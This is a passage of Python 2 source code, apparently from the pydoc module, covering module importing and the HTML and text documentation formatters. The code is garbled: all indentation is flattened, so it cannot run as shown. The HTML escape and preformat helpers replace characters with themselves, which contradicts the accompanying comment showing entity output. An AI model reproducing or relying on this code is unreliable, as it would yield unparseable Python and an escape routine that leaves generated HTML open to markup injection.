info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
            # Guard against a missing or empty docstring.
            result = module.__doc__.splitlines()[0] if module.__doc__ else None
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
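# Example (illustrative; the path is a placeholder):
#   synopsis('/usr/lib/python2.7/os.py')
# returns the first line of that module's docstring, or None if the file
# cannot be read. Results are memoized in `cache`, keyed by filename and
# invalidated when the file's mtime changes.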
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
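# Examples of the behaviour described above (illustrative):
#   safeimport('xml.sax')         returns the xml.sax submodule itself, not xml
#   safeimport('no_such_module')  returns None
# An exception raised while executing a module that was found is re-raised
# wrapped in ErrorDuringImport.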
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
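    # For example (illustrative): escape('<b> & </b>') returns
    # '&lt;b&gt; &amp; &lt;/b&gt;'. '&' is substituted first so that the
    # entities introduced for '<' and '>' are not themselves re-escaped.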
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if sys.platform.startswith('java'):
return plainpager
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
